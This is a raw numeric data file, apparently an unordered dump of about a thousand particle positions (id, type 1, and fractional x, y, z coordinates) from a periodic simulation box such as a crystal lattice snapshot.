944 1 0.379304 0.187944 0.939822
942 1 0.437963 0.189432 0.876325
976 1 0.377693 0.317216 0.939963
975 1 0.445605 0.251 0.935826
974 1 0.43981 0.315061 0.876877
1933 1 0.376676 0.493609 0.872272
1964 1 0.251253 0.684854 0.930565
995 1 0.065405 0.372423 0.933533
1000 1 0.131195 0.440757 0.937235
994 1 0.0623419 0.437682 0.876508
997 1 0.129821 0.376075 0.877737
1070 1 0.439844 0.685526 1.00024
1996 1 0.244597 0.810608 0.942471
998 1 0.188776 0.438275 0.875176
1001 1 0.247382 0.373357 0.869666
999 1 0.190468 0.374702 0.932058
1004 1 0.251272 0.438337 0.932547
1002 1 0.313205 0.432893 0.875032
1003 1 0.311337 0.377111 0.938028
1927 1 0.195429 0.499868 0.934253
1960 1 0.126727 0.691984 0.939132
1 1 0.00436475 -0.00241054 0.995194
1935 1 0.442247 0.498514 0.940102
1934 1 0.441526 0.557328 0.87553
1993 1 0.252614 0.743656 0.872804
1965 1 0.37562 0.620681 0.877935
1991 1 0.191553 0.745422 0.93741
109 1 0.380828 0.378579 0.998134
1008 1 0.38016 0.436389 0.938704
1007 1 0.441756 0.374978 0.937109
1005 1 0.374192 0.375073 0.87169
1006 1 0.439812 0.434921 0.874401
1995 1 0.311004 0.746776 0.936522
1925 1 0.1211 0.500347 0.877627
1923 1 0.0637427 0.497157 0.940242
1922 1 0.0625044 0.559499 0.876071
1928 1 0.123482 0.558739 0.940673
1955 1 0.0644578 0.617384 0.941844
1957 1 0.127067 0.627237 0.871958
1994 1 0.306606 0.811408 0.883031
1963 1 0.316981 0.62152 0.934884
1961 1 0.254675 0.622994 0.869286
1932 1 0.257294 0.56127 0.934142
1931 1 0.315863 0.493316 0.93957
1959 1 0.185295 0.627024 0.93562
1929 1 0.248636 0.498787 0.871531
1926 1 0.187637 0.563845 0.882306
1930 1 0.312421 0.554027 0.870825
1967 1 0.443323 0.624893 0.932696
1936 1 0.370298 0.558216 0.938878
1958 1 0.186658 0.683648 0.874892
1713 1 0.49757 0.616914 0.624328
1892 1 -0.00184886 0.938747 0.809186
532 1 0.500031 0.0575155 0.558523
945 1 0.500772 0.125648 0.878398
868 1 0.0040553 0.43254 0.80903
580 1 0.000708972 0.313294 0.563444
1684 1 0.501952 0.557779 0.687804
1572 1 -0.000500131 0.691335 0.562045
1860 1 0.00188093 0.816538 0.812663
1988 1 0.00372531 0.813429 0.935963
1953 1 0.00363215 0.624622 0.877699
961 1 -0.00342324 0.24952 0.878047
820 1 0.503476 0.182313 0.817508
929 1 -0.00448578 0.127354 0.876885
900 1 -0.00396885 0.0639565 0.935706
1857 1 0.0077197 0.753349 0.747233
660 1 0.493946 0.0625243 0.686755
1793 1 0.0047145 0.495927 0.746367
1646 1 0.435662 0.937587 0.497279
1062 1 0.191883 0.685639 0.998671
1133 1 0.374119 0.875547 0.996237
561 1 0.497688 0.124364 0.50119
98 1 0.0642239 0.436234 1.00015
1029 1 0.128821 0.500517 1.00361
1065 1 0.250203 0.618174 0.995509
105 1 0.249247 0.37787 0.999124
1069 1 0.379797 0.623686 0.992217
550 1 0.194661 0.186846 0.501945
1038 1 0.441785 0.563918 0.997964
1026 1 0.0671187 0.557065 1.0065
34 1 0.0665448 0.188376 1.00363
102 1 0.190836 0.439952 1.00093
70 1 0.184921 0.313895 0.996719
2 1 0.0637328 0.0622296 0.997802
1610 1 0.309213 0.812236 0.500618
610 1 0.0617435 0.438763 0.497906
1634 1 0.0625082 0.941941 0.503477
546 1 0.0644266 0.186581 0.506098
1126 1 0.186882 0.933918 0.994815
1614 1 0.441367 0.812064 0.49812
1582 1 0.4429 0.690711 0.501556
1025 1 0.00243718 0.496597 0.999772
1642 1 0.306481 0.932868 0.499309
14 1 0.437802 0.0577394 0.997652
1066 1 0.310036 0.681924 0.995108
1578 1 0.312167 0.685176 0.494693
1550 1 0.433493 0.558617 0.503146
37 1 0.127922 0.121828 0.99816
101 1 0.129734 0.375202 0.997699
1030 1 0.184218 0.563112 1.00199
577 1 -0.00212934 0.244826 0.502702
1137 1 0.496396 0.875431 0.999107
1102 1 0.440556 0.815455 0.99997
609 1 -0.00116001 0.379188 0.501298
1125 1 0.124189 0.873875 0.995099
1549 1 0.375342 0.499072 0.503484
6 1 0.19694 0.0674476 0.996059
517 1 0.125504 0.00435885 0.49665
1546 1 0.31015 0.561599 0.507038
24 1 0.626399 0.0573837 0.0620094
51 1 0.569128 0.123393 0.0632087
146 1 0.561952 0.0651107 0.127877
181 1 0.626327 0.122176 0.122112
121 1 0.747134 0.375143 -0.00464349
18 1 0.560791 0.0655138 0.00158793
19 1 0.567621 0.997209 0.0621821
28 1 0.75148 0.0641966 0.0647518
55 1 0.692542 0.120706 0.0623231
59 1 0.810665 0.126596 0.063853
150 1 0.690125 0.0594092 0.128109
154 1 0.809862 0.0581578 0.125649
185 1 0.747725 0.127995 0.131601
153 1 0.751709 0.998759 0.133326
23 1 0.687474 1.00078 0.0638551
260 1 1.00127 0.0647922 0.314466
36 1 1.00096 0.182041 0.0592992
32 1 0.872741 0.0637825 0.0606589
63 1 0.935846 0.124073 0.0650631
158 1 0.935715 0.0623437 0.124332
189 1 0.870769 0.123871 0.126185
157 1 0.874158 -0.00109471 0.119846
1492 1 0.504118 0.812252 0.436539
31 1 0.941162 0.998157 0.0582881
56 1 0.625941 0.190568 0.0675596
83 1 0.560225 0.249685 0.0709225
88 1 0.626287 0.316939 0.0644042
178 1 0.566142 0.189259 0.133365
210 1 0.564529 0.314105 0.127352
213 1 0.626413 0.253021 0.132879
1536 1 0.872164 0.939144 0.441238
449 1 0.998967 0.2439 0.371248
20 1 0.500967 0.0603355 0.0611252
1535 1 0.938574 0.873295 0.43828
60 1 0.75152 0.191677 0.067389
87 1 0.686276 0.252742 0.0679084
91 1 0.811584 0.252902 0.0645685
92 1 0.747356 0.308827 0.0662207
182 1 0.68967 0.192822 0.129438
186 1 0.808864 0.187231 0.123336
214 1 0.686486 0.319176 0.132663
217 1 0.749654 0.250111 0.132529
218 1 0.812716 0.313058 0.129589
116 1 0.498315 0.437946 0.0670291
289 1 1.0012 0.122863 0.252484
1049 1 0.750592 0.494831 -0.000278839
64 1 0.871194 0.182681 0.068798
95 1 0.936523 0.242788 0.0708239
96 1 0.87915 0.315597 0.0640727
190 1 0.940601 0.179758 0.129022
221 1 0.874443 0.247053 0.127375
222 1 0.938344 0.314722 0.124155
126 1 0.940549 0.440688 -0.00584294
337 1 0.499266 0.259721 0.255032
53 1 0.626557 0.123389 0.00283229
115 1 0.564066 0.38222 0.061024
120 1 0.627999 0.44224 0.0637311
242 1 0.56656 0.438885 0.128978
245 1 0.625999 0.374625 0.128706
1173 1 0.62977 0.502677 0.125671
119 1 0.687136 0.379375 0.063297
123 1 0.811731 0.370608 0.0596388
124 1 0.751973 0.439314 0.0664706
246 1 0.691414 0.435713 0.126975
249 1 0.753198 0.371848 0.125352
250 1 0.812756 0.431806 0.125983
1047 1 0.689587 0.500318 0.0689718
1561 1 0.750699 0.499362 0.5044
127 1 0.936279 0.376923 0.0558252
128 1 0.872876 0.436011 0.060464
253 1 0.873533 0.374079 0.127734
254 1 0.935464 0.435373 0.12306
1534 1 0.938435 0.947133 0.378054
1043 1 0.560857 0.502843 0.0616467
1048 1 0.624805 0.561807 0.0650246
1075 1 0.56369 0.620688 0.0650105
1170 1 0.561483 0.561674 0.128812
1205 1 0.632945 0.627039 0.122394
89 1 0.752108 0.248007 0.00119117
1051 1 0.815899 0.499205 0.0699382
1177 1 0.753016 0.49875 0.12346
1052 1 0.746027 0.562174 0.0632045
1079 1 0.687681 0.626921 0.0642752
1083 1 0.812019 0.625144 0.0619209
1174 1 0.688241 0.564369 0.124893
1178 1 0.812419 0.561752 0.128513
1209 1 0.7495 0.626379 0.12455
1105 1 0.500748 0.748029 -0.000474966
598 1 0.688593 0.311383 0.502429
30 1 0.941167 0.0630112 -6.47857e-05
1181 1 0.882246 0.499666 0.123565
1055 1 0.939488 0.494432 0.0609133
1056 1 0.876927 0.558049 0.0627759
1087 1 0.941936 0.626067 0.0633304
1182 1 0.938323 0.554363 0.127973
1213 1 0.876933 0.621234 0.123099
1533 1 0.875767 0.878181 0.376209
1053 1 0.87603 0.503417 0.00284468
1149 1 0.876159 0.876313 0.00210626
22 1 0.685798 0.0655557 -0.000597379
1364 1 0.498441 0.812949 0.309874
1080 1 0.627009 0.687896 0.0668721
1107 1 0.564198 0.749335 0.0661631
1112 1 0.624278 0.813019 0.0635718
1202 1 0.562684 0.691889 0.128063
1234 1 0.562453 0.820092 0.129344
1237 1 0.62981 0.753055 0.126427
465 1 0.503834 0.250517 0.377166
84 1 0.499112 0.312148 0.0631002
1537 1 0.995842 0.49859 0.493157
1084 1 0.751238 0.684951 0.057661
1111 1 0.686711 0.75061 0.0671969
1115 1 0.815331 0.749606 0.0657126
1116 1 0.753793 0.805134 0.0645913
1206 1 0.68759 0.688848 0.12561
1210 1 0.809828 0.685595 0.121423
1238 1 0.691506 0.815457 0.122813
1241 1 0.750402 0.746865 0.126272
1242 1 0.816504 0.809113 0.130981
212 1 0.504838 0.31512 0.183909
637 1 0.878332 0.376708 0.498344
90 1 0.814058 0.310888 0.00203436
1088 1 0.875141 0.685287 0.0659761
1119 1 0.942222 0.751437 0.0601177
1120 1 0.875243 0.815143 0.0679469
1214 1 0.936526 0.689404 0.124881
1245 1 0.876961 0.75139 0.124961
1246 1 0.937681 0.812435 0.125173
407 1 0.690365 0.00416773 0.43904
149 1 0.627509 0.999859 0.125985
1139 1 0.555724 0.876777 0.0587742
1144 1 0.626344 0.934276 0.0630045
1266 1 0.565858 0.934227 0.123201
1269 1 0.625854 0.873164 0.127484
420 1 0.997661 0.189904 0.438993
177 1 0.499892 0.124136 0.121665
50 1 0.558885 0.188503 -0.00183613
1532 1 0.749237 0.942934 0.438125
468 1 0.503894 0.316023 0.435197
1412 1 0.995999 0.562911 0.435046
27 1 0.805684 0.0020473 0.0579308
1143 1 0.6862 0.873127 0.0624444
1147 1 0.811813 0.87246 0.0636943
1148 1 0.748896 0.936742 0.0598553
1270 1 0.689207 0.937451 0.124815
1273 1 0.75261 0.876919 0.124818
1274 1 0.816338 0.93598 0.124011
62 1 0.929887 0.184326 0.00225384
436 1 0.498285 0.190925 0.440001
1089 1 1.0043 0.750887 0.00110582
225 1 0.998286 0.373808 0.124073
1151 1 0.939448 0.877288 0.0647018
1152 1 0.874055 0.938479 0.0574861
1277 1 0.877001 0.876588 0.130924
1278 1 0.939212 0.937828 0.123423
1531 1 0.811773 0.872399 0.442003
1530 1 0.815692 0.935998 0.370798
152 1 0.626527 0.0646744 0.185552
179 1 0.562604 0.127133 0.184483
274 1 0.55994 0.0607368 0.24737
280 1 0.624229 0.0641817 0.315419
307 1 0.558075 0.124656 0.31255
309 1 0.619585 0.125554 0.248222
277 1 0.623903 0.00155706 0.251003
147 1 0.566657 -0.00708448 0.18413
156 1 0.747393 0.0650819 0.187682
183 1 0.681318 0.125598 0.189112
187 1 0.812724 0.12481 0.187469
278 1 0.681987 0.0578485 0.25069
282 1 0.810175 0.0570482 0.244455
284 1 0.743005 0.064281 0.313457
311 1 0.683918 0.121742 0.31048
313 1 0.746081 0.125577 0.25012
315 1 0.813855 0.124746 0.312645
281 1 0.743419 -0.00163245 0.249864
283 1 0.811966 0.00988793 0.31442
151 1 0.686569 0.994615 0.187699
1529 1 0.752064 0.885585 0.378473
160 1 0.873094 0.0583237 0.183269
191 1 0.940276 0.120001 0.188919
286 1 0.935403 0.0609867 0.250638
288 1 0.871732 0.0636187 0.314754
317 1 0.878297 0.117543 0.247656
319 1 0.94055 0.124761 0.312327
285 1 0.875682 1.00398 0.250372
159 1 0.936573 0.998677 0.188263
1527 1 0.687548 0.8803 0.439749
184 1 0.623357 0.19094 0.190932
211 1 0.557477 0.254581 0.191985
216 1 0.62441 0.313523 0.192085
306 1 0.562656 0.192125 0.250491
312 1 0.617915 0.189762 0.310203
338 1 0.567204 0.313978 0.25679
339 1 0.562825 0.252283 0.31273
341 1 0.626044 0.251465 0.25013
344 1 0.634351 0.313854 0.310816
1526 1 0.683496 0.943375 0.37458
209 1 0.495059 0.245963 0.124139
188 1 0.749056 0.188543 0.18898
215 1 0.68662 0.250302 0.193292
219 1 0.813533 0.249404 0.187642
220 1 0.754578 0.314291 0.189746
310 1 0.687238 0.185585 0.255127
314 1 0.811393 0.186446 0.249862
316 1 0.750716 0.191159 0.313574
342 1 0.695194 0.3167 0.247933
343 1 0.687677 0.249811 0.314641
345 1 0.749955 0.24828 0.247321
346 1 0.816086 0.314364 0.24951
347 1 0.813691 0.252189 0.309905
348 1 0.750108 0.312268 0.310734
1566 1 0.937206 0.5645 0.497417
192 1 0.872576 0.184583 0.185538
223 1 0.930222 0.247659 0.184436
224 1 0.873957 0.315106 0.18587
318 1 0.93404 0.184579 0.246518
320 1 0.872808 0.18723 0.312327
349 1 0.871422 0.245333 0.246785
350 1 0.932937 0.307128 0.249369
351 1 0.932197 0.249593 0.310561
352 1 0.873114 0.312677 0.313165
500 1 0.49818 0.438073 0.433481
405 1 0.618308 1.00107 0.376128
403 1 0.56116 1.00065 0.436654
243 1 0.565488 0.370796 0.194017
248 1 0.623906 0.435321 0.194627
370 1 0.561381 0.442843 0.250657
371 1 0.562229 0.376432 0.314919
373 1 0.630369 0.376981 0.253648
376 1 0.627152 0.440744 0.312374
1299 1 0.56074 0.503584 0.309368
1301 1 0.627739 0.500863 0.249164
1525 1 0.626846 0.875706 0.374005
247 1 0.687605 0.378971 0.188348
251 1 0.816702 0.374796 0.191324
252 1 0.751907 0.438688 0.190764
374 1 0.687907 0.441711 0.247966
375 1 0.691284 0.377807 0.31381
377 1 0.756052 0.373455 0.250226
378 1 0.812192 0.435866 0.254067
379 1 0.811052 0.379165 0.311514
380 1 0.746239 0.439716 0.309231
1303 1 0.687375 0.502855 0.310039
255 1 0.938987 0.372358 0.186859
256 1 0.874585 0.434938 0.190311
381 1 0.876132 0.373183 0.24982
382 1 0.939547 0.435715 0.249803
383 1 0.940315 0.374917 0.309483
384 1 0.877112 0.432247 0.313713
1528 1 0.626326 0.941703 0.437469
1171 1 0.560198 0.503369 0.190573
1176 1 0.629624 0.569354 0.183701
1203 1 0.564167 0.625842 0.187202
1298 1 0.565303 0.566679 0.248547
1304 1 0.625224 0.560892 0.312594
1331 1 0.563836 0.624798 0.308937
1333 1 0.6295 0.621272 0.251887
1307 1 0.813554 0.494678 0.315562
1175 1 0.690326 0.500886 0.184464
1179 1 0.818176 0.502332 0.187223
1305 1 0.754885 0.503189 0.250601
1180 1 0.747396 0.559749 0.178471
1207 1 0.690935 0.625492 0.187462
1211 1 0.80858 0.627457 0.186713
1302 1 0.689262 0.556031 0.247502
1306 1 0.809424 0.563652 0.252903
1308 1 0.746103 0.561675 0.307773
1335 1 0.687871 0.6278 0.316868
1337 1 0.748447 0.624246 0.250279
1339 1 0.811867 0.624245 0.313207
1183 1 0.942947 0.497219 0.190815
1311 1 0.935515 0.499938 0.313956
1309 1 0.872336 0.499664 0.255478
1184 1 0.878004 0.558334 0.18806
1215 1 0.932909 0.623217 0.19029
1310 1 0.936606 0.559162 0.250335
1312 1 0.874764 0.565642 0.31578
1341 1 0.866591 0.620323 0.248564
1343 1 0.932963 0.626077 0.316859
1522 1 0.5613 0.933637 0.37552
1523 1 0.56598 0.878902 0.439201
530 1 0.558157 0.0635147 0.497017
1208 1 0.62729 0.683205 0.182406
1235 1 0.563978 0.753216 0.185366
1240 1 0.626695 0.814612 0.188029
1330 1 0.564838 0.687784 0.249435
1336 1 0.626283 0.689862 0.311601
1362 1 0.560157 0.809616 0.247972
1363 1 0.568586 0.752848 0.316687
1365 1 0.627499 0.748197 0.249301
1368 1 0.630481 0.815408 0.31868
25 1 0.743762 0.00530171 -0.00434486
1332 1 0.504929 0.694435 0.307064
1472 1 0.874234 0.693798 0.438284
1212 1 0.752717 0.688854 0.184415
1239 1 0.689571 0.757897 0.191435
1243 1 0.814315 0.750896 0.192066
1244 1 0.747304 0.814934 0.191123
1334 1 0.688464 0.68811 0.243511
1338 1 0.813803 0.686647 0.252243
1340 1 0.753326 0.692242 0.314621
1366 1 0.689818 0.818837 0.255166
1367 1 0.688748 0.752748 0.315006
1369 1 0.752134 0.750355 0.256118
1370 1 0.808156 0.814049 0.252722
1371 1 0.812666 0.753459 0.318654
1372 1 0.749297 0.813962 0.31357
1503 1 0.93913 0.750093 0.44067
1216 1 0.870858 0.688393 0.191009
1247 1 0.932469 0.751796 0.193049
1248 1 0.876798 0.813966 0.188085
1342 1 0.932146 0.689624 0.248402
1344 1 0.874926 0.688589 0.31051
1373 1 0.87476 0.753937 0.25347
1374 1 0.940045 0.818557 0.251944
1375 1 0.940855 0.750224 0.315017
1376 1 0.877197 0.814635 0.315132
1621 1 0.625842 0.754317 0.502859
257 1 1.00056 1.00335 0.251495
1501 1 0.87711 0.751429 0.374278
275 1 0.562135 0.00157285 0.316362
1267 1 0.558077 0.875087 0.192856
1272 1 0.627612 0.935189 0.191423
1394 1 0.562675 0.937239 0.245528
1395 1 0.562815 0.877199 0.312535
1397 1 0.625178 0.871771 0.252176
1400 1 0.621324 0.93477 0.311059
1504 1 0.877075 0.807644 0.437581
279 1 0.685421 0.99602 0.313104
155 1 0.810611 0.999327 0.186718
1271 1 0.688447 0.872861 0.189733
1275 1 0.813736 0.874178 0.186308
1276 1 0.745509 0.936299 0.194416
1398 1 0.68642 0.936438 0.254259
1399 1 0.689264 0.877546 0.314222
1401 1 0.749206 0.879059 0.251246
1402 1 0.807056 0.936569 0.253101
1403 1 0.811045 0.873497 0.315128
1404 1 0.751885 0.943789 0.316185
287 1 0.938713 0.000483162 0.308656
1279 1 0.938701 0.873123 0.190021
1280 1 0.872766 0.941256 0.189545
1405 1 0.874899 0.874592 0.245922
1406 1 0.929566 0.937995 0.250949
1407 1 0.933783 0.879961 0.314496
1408 1 0.877066 0.941669 0.314366
1380 1 0.998659 0.941054 0.312307
402 1 0.558265 0.060602 0.375813
408 1 0.620313 0.0682182 0.437008
435 1 0.555667 0.127692 0.435529
437 1 0.622625 0.130653 0.377408
1316 1 0.997946 0.689577 0.318756
1042 1 0.56249 0.564875 -0.00282372
1041 1 0.501524 0.497927 -0.00452964
452 1 1.0021 0.307144 0.438702
1470 1 0.937341 0.689029 0.382574
409 1 0.753021 -0.00092366 0.37568
411 1 0.814901 1.00091 0.435851
406 1 0.683113 0.0623334 0.375204
410 1 0.809491 0.0651039 0.377121
412 1 0.749293 0.061342 0.438738
439 1 0.679536 0.126744 0.442413
441 1 0.746317 0.124035 0.379538
443 1 0.806858 0.127981 0.44535
1172 1 0.50147 0.563695 0.184205
1494 1 0.687964 0.816248 0.380681
1462 1 0.691297 0.690319 0.379678
415 1 0.93017 0.00799177 0.437365
1466 1 0.810122 0.684164 0.380375
1495 1 0.690644 0.756526 0.445918
413 1 0.870813 0.00453861 0.373829
414 1 0.93683 0.0685827 0.375239
416 1 0.873511 0.066177 0.437316
445 1 0.872332 0.127983 0.373344
447 1 0.933267 0.131241 0.439119
601 1 0.751013 0.250811 0.50185
1653 1 0.623233 0.879187 0.504394
472 1 0.630641 0.318209 0.434524
469 1 0.630933 0.246899 0.37193
467 1 0.568244 0.256945 0.436316
434 1 0.564443 0.189482 0.376455
440 1 0.61976 0.189431 0.441288
466 1 0.563533 0.311114 0.371584
1044 1 0.499505 0.561926 0.0637179
442 1 0.805569 0.182486 0.381608
438 1 0.69162 0.183468 0.374521
471 1 0.685088 0.247099 0.440329
473 1 0.751998 0.247862 0.375144
474 1 0.812794 0.316446 0.373299
444 1 0.745523 0.190573 0.440185
475 1 0.80826 0.253556 0.43643
476 1 0.750052 0.315558 0.438847
470 1 0.691867 0.312157 0.374491
1468 1 0.748035 0.68663 0.445906
1499 1 0.811555 0.752183 0.438162
1565 1 0.876794 0.499229 0.499817
1502 1 0.936755 0.812917 0.377779
1498 1 0.812308 0.812212 0.37293
1108 1 0.503369 0.80935 0.0639841
1458 1 0.565434 0.687178 0.370264
566 1 0.681689 0.186346 0.503035
479 1 0.937811 0.248827 0.439996
480 1 0.874524 0.311738 0.441792
478 1 0.935466 0.307722 0.38129
477 1 0.873857 0.248389 0.375406
446 1 0.933488 0.187279 0.377199
448 1 0.868713 0.189084 0.438119
164 1 0.995929 0.181515 0.188601
1490 1 0.563986 0.817228 0.377347
1073 1 0.498721 0.626729 -0.00120564
499 1 0.56465 0.378642 0.435035
504 1 0.628946 0.443282 0.436079
501 1 0.62468 0.373385 0.367899
498 1 0.559649 0.443346 0.374542
1427 1 0.561905 0.505425 0.434401
1429 1 0.624059 0.50078 0.372679
1464 1 0.625624 0.689332 0.436164
508 1 0.747801 0.441489 0.438185
507 1 0.812376 0.377122 0.440751
506 1 0.810007 0.434113 0.378169
505 1 0.751756 0.376641 0.37226
503 1 0.689509 0.377169 0.436528
502 1 0.693328 0.440835 0.374794
1433 1 0.751441 0.501759 0.368061
1435 1 0.810674 0.50166 0.436403
1496 1 0.626953 0.814239 0.440216
1493 1 0.628667 0.75222 0.382282
58 1 0.815506 0.185342 0.00289469
512 1 0.872972 0.441895 0.432139
511 1 0.937802 0.370963 0.43853
510 1 0.937571 0.435915 0.378947
509 1 0.87491 0.370873 0.375597
1439 1 0.935458 0.500094 0.434809
196 1 0.994652 0.306055 0.186161
1426 1 0.567772 0.568696 0.374452
1432 1 0.625505 0.563538 0.438437
1459 1 0.564636 0.631296 0.433894
1461 1 0.626579 0.624993 0.37657
1491 1 0.559137 0.746751 0.438681
1500 1 0.749717 0.818052 0.439105
1431 1 0.691916 0.501164 0.442349
1463 1 0.68841 0.62397 0.439778
1436 1 0.751012 0.564175 0.435274
1434 1 0.810591 0.562142 0.374977
1430 1 0.688389 0.55918 0.375962
1467 1 0.806719 0.626823 0.441497
1465 1 0.749899 0.627537 0.374793
1497 1 0.746086 0.755554 0.373734
1233 1 0.503187 0.755399 0.126017
1437 1 0.875349 0.50203 0.374693
1438 1 0.934309 0.560364 0.37365
1440 1 0.871699 0.560766 0.436652
1469 1 0.870525 0.620823 0.378926
1471 1 0.938264 0.627157 0.434858
1524 1 0.496185 0.940243 0.439518
1633 1 1.00172 0.878616 0.504525
61 1 0.871642 0.119607 0.0011204
308 1 0.499633 0.188804 0.313705
145 1 0.504333 0.994294 0.123138
117 1 0.62515 0.376624 -0.000608342
1145 1 0.74768 0.871998 0.00237672
638 1 0.939468 0.435891 0.492934
1593 1 0.747953 0.625482 0.502839
602 1 0.812945 0.310314 0.496508
1521 1 0.49993 0.87722 0.369943
1618 1 0.562803 0.817464 0.500522
630 1 0.687523 0.438248 0.500669
1113 1 0.753883 0.744308 -0.00149954
1185 1 0.994837 0.621112 0.129289
52 1 0.504674 0.185094 0.0658266
1081 1 0.745937 0.623211 -0.00339365
1045 1 0.620626 0.501386 0.00174516
1489 1 0.501104 0.750688 0.369697
1076 1 0.504736 0.684138 0.0665576
1444 1 0.996142 0.690878 0.436632
193 1 1.00331 0.238795 0.130464
305 1 0.499736 0.12483 0.249097
1284 1 0.998863 0.561875 0.317813
68 1 0.997609 0.315429 0.0636683
1201 1 0.502786 0.622181 0.123368
1217 1 0.999789 0.756978 0.133099
356 1 0.999547 0.439591 0.311844
634 1 0.81745 0.438837 0.498112
565 1 0.616012 0.126036 0.500062
1313 1 0.994137 0.625911 0.250877
1562 1 0.807679 0.559778 0.501099
1300 1 0.498344 0.566131 0.308456
1220 1 1.00136 0.82078 0.189322
1204 1 0.501695 0.686336 0.181146
1409 1 0.999563 0.501652 0.380515
321 1 0.993202 0.245019 0.249001
324 1 0.992403 0.309718 0.313357
273 1 0.500007 0.00198396 0.243554
369 1 0.498232 0.377285 0.25234
417 1 1.00032 0.129007 0.379843
1188 1 0.992419 0.691663 0.186962
241 1 0.502051 0.37949 0.127642
542 1 0.937185 0.0660915 0.500223
65 1 0.995246 0.243345 0.00801298
1597 1 0.876699 0.629893 0.495671
1558 1 0.690422 0.559202 0.499397
570 1 0.809431 0.191819 0.504315
114 1 0.566464 0.439002 0.000394092
541 1 0.871073 0.00384553 0.500574
86 1 0.68729 0.312034 0.00363204
122 1 0.812474 0.438638 -0.000130935
629 1 0.629611 0.378429 0.497702
626 1 0.559494 0.441416 0.494976
1086 1 0.935866 0.683333 0.00237814
1054 1 0.941694 0.558137 0.00338406
29 1 0.870304 0.00348507 0.000223778
93 1 0.875994 0.249718 0.0049311
534 1 0.681723 0.0633942 0.498693
57 1 0.751511 0.127965 0.00476684
593 1 0.505982 0.253682 0.497061
1077 1 0.625851 0.621929 -0.00332039
1662 1 0.935855 0.937067 0.499988
1085 1 0.873431 0.621288 0.00138137
54 1 0.68633 0.183964 0.00610228
1046 1 0.685568 0.559875 0.00519794
85 1 0.624662 0.248726 0.00791486
82 1 0.565603 0.31359 0.00707315
1050 1 0.80921 0.560008 0.00321695
94 1 0.940609 0.308038 0.00391409
536 1 0.625322 0.062472 0.558766
563 1 0.556949 0.125799 0.563134
658 1 0.556974 0.0651907 0.625805
693 1 0.623279 0.121473 0.626061
1716 1 0.502676 0.68355 0.687987
964 1 0.997863 0.313622 0.937494
612 1 0.99744 0.437776 0.563421
605 1 0.871862 0.248038 0.499288
540 1 0.749348 0.0676328 0.56802
567 1 0.682601 0.124021 0.560771
571 1 0.811639 0.130597 0.558475
662 1 0.686986 0.0596153 0.625566
666 1 0.812254 0.0704029 0.624109
697 1 0.745141 0.128796 0.626354
539 1 0.813371 0.00516001 0.565823
535 1 0.684509 0.00879617 0.558864
665 1 0.747587 -0.000768396 0.622979
573 1 0.869875 0.130677 0.5004
544 1 0.870994 0.0698446 0.559107
575 1 0.934832 0.12301 0.563343
670 1 0.941061 0.058981 0.620028
701 1 0.877958 0.129353 0.622136
865 1 0.998904 0.37032 0.746496
2017 1 1.00193 0.872715 0.870714
568 1 0.62191 0.186143 0.559143
595 1 0.559993 0.246587 0.558802
600 1 0.624292 0.315724 0.560503
690 1 0.561991 0.190172 0.618902
722 1 0.5643 0.312528 0.619067
725 1 0.624324 0.252563 0.621387
1630 1 0.934644 0.814651 0.501791
708 1 0.995448 0.310251 0.685878
916 1 0.501195 0.0620524 0.937784
1556 1 0.50485 0.560217 0.554625
572 1 0.745244 0.185298 0.560453
599 1 0.687589 0.251222 0.560771
603 1 0.808188 0.249005 0.562985
604 1 0.75041 0.320739 0.56141
694 1 0.68279 0.183606 0.621421
698 1 0.810656 0.189816 0.624987
726 1 0.692483 0.310118 0.623854
729 1 0.747327 0.247687 0.621291
730 1 0.811239 0.31678 0.620938
594 1 0.564511 0.319748 0.494181
1009 1 0.500801 0.372506 0.874704
576 1 0.87617 0.189442 0.564486
607 1 0.938401 0.255454 0.562257
608 1 0.87255 0.311964 0.563538
702 1 0.934881 0.194001 0.622701
733 1 0.872414 0.250092 0.626786
734 1 0.940491 0.311363 0.623376
657 1 0.501465 -8.35426e-06 0.62827
1626 1 0.810919 0.810424 0.504714
1748 1 0.498836 0.808089 0.684966
627 1 0.560569 0.377551 0.557422
632 1 0.621339 0.43656 0.559066
754 1 0.566227 0.435943 0.623454
757 1 0.62872 0.375508 0.624749
1685 1 0.627772 0.499044 0.618845
948 1 0.502606 0.188208 0.941444
631 1 0.68434 0.379782 0.564112
635 1 0.815663 0.377107 0.556827
636 1 0.753588 0.439804 0.562911
758 1 0.689017 0.444568 0.617908
761 1 0.747615 0.380071 0.623627
762 1 0.816019 0.436476 0.619469
1563 1 0.813404 0.50218 0.558655
1940 1 0.500806 0.558225 0.938726
639 1 0.932937 0.374114 0.565059
640 1 0.878583 0.433338 0.56324
765 1 0.875328 0.375627 0.626322
766 1 0.938332 0.435913 0.625389
1969 1 0.499989 0.626589 0.873156
1812 1 0.501469 0.563651 0.811574
996 1 0.997996 0.43519 0.93533
1555 1 0.564437 0.50315 0.56559
1560 1 0.627349 0.564549 0.564105
1587 1 0.563104 0.628817 0.559946
1682 1 0.564776 0.566266 0.62483
1717 1 0.626337 0.624624 0.624624
2048 1 0.871762 0.938841 0.939904
1078 1 0.683879 0.690427 1.00457
2047 1 0.944842 0.880436 0.933027
1697 1 1.00031 0.623375 0.626068
1559 1 0.689595 0.505491 0.56136
1689 1 0.748269 0.500969 0.622262
1564 1 0.746978 0.563856 0.565633
1591 1 0.686047 0.624792 0.563861
1595 1 0.814867 0.62293 0.557879
1686 1 0.688904 0.566735 0.628971
1690 1 0.817024 0.559547 0.624429
1721 1 0.756174 0.624915 0.628337
1109 1 0.622291 0.751406 1.00274
897 1 0.999246 -0.000199348 0.87137
1636 1 0.99962 0.945255 0.564407
1567 1 0.938298 0.497593 0.555053
1693 1 0.87871 0.499384 0.620143
1568 1 0.878825 0.565272 0.557921
1599 1 0.93702 0.624369 0.558547
1694 1 0.938108 0.560984 0.623898
1725 1 0.878455 0.620249 0.622291
538 1 0.806525 0.0659754 0.498967
801 1 1.00328 0.118854 0.747926
2046 1 0.938885 0.936418 0.872195
1592 1 0.627181 0.687899 0.564434
1619 1 0.56711 0.748129 0.563199
1624 1 0.620577 0.812764 0.564626
1714 1 0.558512 0.686243 0.622796
1746 1 0.558114 0.817806 0.624538
1749 1 0.622949 0.752937 0.623957
1985 1 0.995786 0.750227 0.871195
932 1 0.999549 0.187425 0.938107
1596 1 0.752931 0.68556 0.565132
1623 1 0.692979 0.744269 0.568313
1627 1 0.811505 0.752953 0.569103
1628 1 0.750011 0.811748 0.562083
1718 1 0.685374 0.683351 0.631438
1722 1 0.811315 0.684821 0.62996
1750 1 0.684378 0.812834 0.624209
1753 1 0.748827 0.748821 0.631811
1754 1 0.811281 0.813537 0.620341
769 1 0.999109 1.00139 0.749438
2045 1 0.875785 0.876496 0.875492
